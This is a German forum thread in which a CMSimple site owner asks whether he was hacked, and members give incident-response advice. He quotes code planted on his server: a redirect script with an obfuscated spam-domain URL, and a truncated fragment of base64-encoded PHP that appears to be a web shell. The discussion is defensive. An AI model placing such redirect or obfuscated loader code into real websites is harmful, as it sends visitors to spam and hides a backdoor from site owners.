gehackt?

Ein CMSimple Support Forum für deutsch sprechende Nutzer und Entwickler
albert
Posts: 404
Joined: Sun Mar 07, 2010 8:01 pm
Location: Germany
Contact:

gehackt?

Postby albert » Fri Nov 10, 2017 7:57 am

Hallo zusammen,
seit gestern erhalte ich viele Mails "Undelivered Mail Returned to Sender". Offenbar versendet jemand potenzmittel-Spammails von meinem account. In der mail ein link auf (meine Seite) http://www.albert-wilhelm.de/ [enfernt] .html
Die html-Datei ist mir völlig unbekannt, hab sie erstmal umbenannt. Drin steht:

Code: Select all

   <script>
      var aegj = "p";
      window.location.href = "http://tophot" + aegj + "rice.name/";
   </script>

Ich frage mich: Wie hat jemand diese html im root meiner Seite platzieren können?

PS: Klar werde ich passwörter ändern... aber beunruhigend isset schon

Nachtrag:
Hab noch eine [entfernt].php gefunden, wo haufenweise Zeugs drinsteht wie:

Code: Select all

$lb8GNaXS=array('3NjEwZDk2YTA5MDc5MDk0ZWVkIjsKJEdMT0JBTFNbJ2RlZmF1bHRfYWN0aW9u','J10gICAgICA9ICdTcWwnOwokR0xPQkFMU1snZGVmYXVsdF91c2VfYWpheCddICA');
$lFyE=YyG($lFyE, join('', $lb8GNaXS) );
$lFyE=YyG($lFyE,"gID0gdHJ1ZTsKJEdMT0
Last edited by Holger on Fri Nov 10, 2017 8:54 am, edited 2 times in total.
Reason: Name der PHP-Datei entfernt

olape
Posts: 329
Joined: Fri Mar 13, 2015 8:47 am
Contact:

Re: gehackt?

Postby olape » Fri Nov 10, 2017 8:27 am

Gehackt klingt plausibel.
Deine PW ändern ist die richtige Reaktion.

Bitte prüfe alle Software, soweit es geht, auf Aktualität!
Verständige den Hoster! Es muss nicht deine Schuld sein.
Bietet der Hoster einen Virenscanner, den du selber aktivieren kannst?

Möglicherweise kann die Schwachstelle aber auch bei deinen lokalen Geräten liegen.

Es kann aber auch gut sein, dass du gar nichts damit zu tun hast.

Du siehst, der Möglichkeiten gibt es viele. Du kannst nur versuchen, in Ruhe und mit System alles zu prüfen so weit es geht.

Beide Erfahrungen habe ich schon machen müssen.

Einmal eine Software (PHP) eingesetzt, die eine Lücke hatte. Da hat sich dann auch der Hoster / Virenscanner gemeldet.
Einmal wurde auf dem Server alle index.php aller gehosteten Webseiten ausgetauscht. In diesem Fall war also meinerseits kein Einfluss möglich.

Holger
Site Admin
Posts: 2715
Joined: Mon May 19, 2008 7:10 pm
Location: Hessen, Germany
Contact:

Re: gehackt?

Postby Holger » Fri Nov 10, 2017 8:53 am

Ich hab' erstmal den Link zur HTML-Datei entfernt. Wir wollen doch nicht noch zur Spam-Verbreitung beitragen.

albert wrote:Drin steht:
Das ist eine Umleitung zu einer in Rußland gehosteten Spam-Seite.

albert wrote:Hab noch eine [entfenrnt].php gefunden, wo haufenweise Zeugs drinsteht wie:
Vermutlich ist der PHP-Code nur base64 codiert.
Wäre mal interessant zu sehen, was drin steht. Vielleicht das Skript, das die Mails verschickt.

Hat der Hoster nicht Alarm geschlagen, wenn wirklich "haufenweise" Mails versendet wurden?

albert
Posts: 404
Joined: Sun Mar 07, 2010 8:01 pm
Location: Germany
Contact:

Re: gehackt?

Postby albert » Fri Nov 10, 2017 9:03 am

den link entfernen wär nicht nötig gewesen, die datei gibt es nicht mehr, trotzdem danke.

Nein der Hoster hat nicht Alarm geschlagen, vielleicht waren es ja nich sooo viele. Bei mir sind halt ca. 20-30 als unzustellbar angekommen... und ich hoffe, dass damit erstmal gut ist.

Aber ich frage mich wie ist das passiert?

cmb
Posts: 12029
Joined: Tue Jun 21, 2011 11:04 am
Location: Mü-Sa, RLP, DE
Contact:

Re: gehackt?

Postby cmb » Fri Nov 10, 2017 9:37 am

albert wrote:Aber ich frage mich wie ist das passiert?

Olaf hat ja bereits diverse Möglichkeiten genannt. Du könntest in den diversen Server-Logs mal nach verdächtigen Aktivitäten suchen – vielleicht findet sich ja etwas.
Christoph M. Becker –Plugins for CMSimple_XH, but not for CMSimple 4+

Holger
Site Admin
Posts: 2715
Joined: Mon May 19, 2008 7:10 pm
Location: Hessen, Germany
Contact:

Re: gehackt?

Postby Holger » Fri Nov 10, 2017 10:01 am

cmb wrote:
albert wrote:Aber ich frage mich wie ist das passiert?

Olaf hat ja bereits diverse Möglichkeiten genannt. Du könntest in den diversen Server-Logs mal nach verdächtigen Aktivitäten suchen – vielleicht findet sich ja etwas.

Oftmals kommt man ja nicht an alle Logs ran. Ich würde dem Hoster deshalb den Fall einfach mal schildern und um Hilfe bitten.

olape
Posts: 329
Joined: Fri Mar 13, 2015 8:47 am
Contact:

Re: gehackt?

Postby olape » Fri Nov 10, 2017 10:13 am

Holger wrote:Oftmals kommt man ja nicht an alle Logs ran. Ich würde dem Hoster deshalb den Fall einfach mal schildern und um Hilfe bitten.

Wahrscheinlich der beste Weg. Es sollte ja auch im Interesse des Hosters liegen, festzustellen wie das zustande gekommen ist.
Normalerweise kann der Hoster genau feststellen, wann und von wem (also welcher Benutzer) eine Datei erstellt wurde. Das würde schon ganz gut zeigen, wo möglicherweise eine Lücke ist.

lck
Posts: 1028
Joined: Wed Mar 23, 2011 11:43 am
Location: Dahoam ;)
Contact:

Re: gehackt?

Postby lck » Fri Nov 10, 2017 6:06 pm

albert wrote:Hab noch eine [entfernt].php gefunden, wo haufenweise Zeugs drinsteht wie:

Sucht man nur nach $lb8GNaXS=array so findet man einen Link zu einem PHP-Decoder mit diesem Suchstring und auch deinen geposteten kompletten Code (ist ja nur ein Teil der Datei). Nur mit dem Decoding kann ich nichts anfangen.

Habe aber noch eine andere Datei gefunden, die auch diesen Code enthält, scheint etwas mit Wordpress zu tun zu haben, den Namen der Datei nach (den Namen poste ich mal nicht, bei Interesse bitte PN).

Ich würde die Webseite sicherheitshalber löschen und durch die lokale Kopie ersetzen, falls vorhanden. Falls keine vorhanden ist, wenigstens die Webseite komplett herunterladen und mit Antivirensoftware scannen. Alternativ mit diesem Online-Tool, da sieht es momentan gut aus.
Bevor du den Pfeil der Wahrheit abschießt, tauche die Spitze in Honig ;)       ► CMSimple_XH Templates & OnePage-Templates ◄

cmb
Posts: 12029
Joined: Tue Jun 21, 2011 11:04 am
Location: Mü-Sa, RLP, DE
Contact:

Re: gehackt?

Postby cmb » Fri Nov 10, 2017 6:40 pm

lck wrote:Sucht man nur nach $lb8GNaXS=array so findet man einen Link zu einem PHP-Decoder mit diesem Suchstring und auch deinen geposteten kompletten Code (ist ja nur ein Teil der Datei). Nur mit dem Decoding kann ich nichts anfangen.

Das was ich unter ddecode.com/phpdecoder finde, ist nicht hilfreich, weil die Decodierung offensichtlich verfrüht abbrach.

lck wrote:Habe aber noch eine andere Datei gefunden, die auch diesen Code enthält, scheint etwas mit Wordpress zu tun zu haben, den Namen der Datei nach (den Namen poste ich mal nicht, bei Interesse bitte PN).

Würde ich mir gerne mal anschauen.
Christoph M. Becker –Plugins for CMSimple_XH, but not for CMSimple 4+

albert
Posts: 404
Joined: Sun Mar 07, 2010 8:01 pm
Location: Germany
Contact:

Re: gehackt?

Postby albert » Fri Nov 10, 2017 6:53 pm

lck wrote:Habe aber noch eine andere Datei gefunden, die auch diesen Code enthält

wo? auf meiner Seite oder irgendwo im Netz?

PS danke für die Tipps

Nachtrag: Ups, die o.g. html-Datei war plötzlich ein zweites Mal da, stand aber ein etwas anders href drin, ist also neu


Return to “Deutsch”

Who is online

Users browsing this forum: Flop and 4 guests